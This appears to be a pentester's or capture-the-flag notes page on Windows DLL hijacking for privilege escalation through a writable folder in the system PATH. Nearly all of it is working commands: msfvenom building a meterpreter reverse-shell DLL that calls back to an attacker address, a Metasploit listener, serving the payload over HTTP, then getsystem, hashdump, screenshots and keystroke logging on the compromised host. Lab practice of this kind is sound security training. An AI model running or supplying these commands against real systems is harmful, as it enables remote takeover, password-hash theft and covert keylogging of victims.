DLL Hijack MSF

Metasploit Method

----------------------
Exploitable Service:
C:\Program Files\DeveloperDebugTools\Service\DeveloperService.exe

Write access to this folder, which was in the PATH:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\

If we can get the evil .dll into that PATH folder.
Then restart the service (or reboot).
It will kick off that .dll with System access!!!

----------------------
Create the dll:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll

64 bit option:  
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll

----------------------
Listener:
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set payload windows/x64/meterpreter/reverse_tcp  ..64bit optional
> set LHOST 10.x.x.x
> set LPORT 4444
> exploit

----------------------
Copy to Windows:
> cd data
> python -m SimpleHTTPServer 51001

Windows:
> http://10.102.3.116:51001
.. Also, after downloading.. r.click prop 'unblock' maybe helped?
Works!!

Copy the file here:
C:\Program Files (x86)\Common Files\Oracle\Java\javapath

Rebooted the Windows Server
This kicked off the Service, which ran the evil .dll !!!!!
Watched my "Listener" and picked it up!!!



----------------------
Connected!!
mtp>> sysinfo
mtp>> getuid
mtp>> cd home
mtp>> pwd
mtp>> cd Desktop

met> sessions -i 1
met> getuid
met> getsystem  --will switch you to system privs
met> screenshot
met> hashdump 
met> help   (keylogger, webcam_snap)
met> keyscan_start
met> keyscan_dump   ... shows the keyscan!!

meterpreter > cat flag.txt

More...

PreviousBloodhoundNextKerberos

Last updated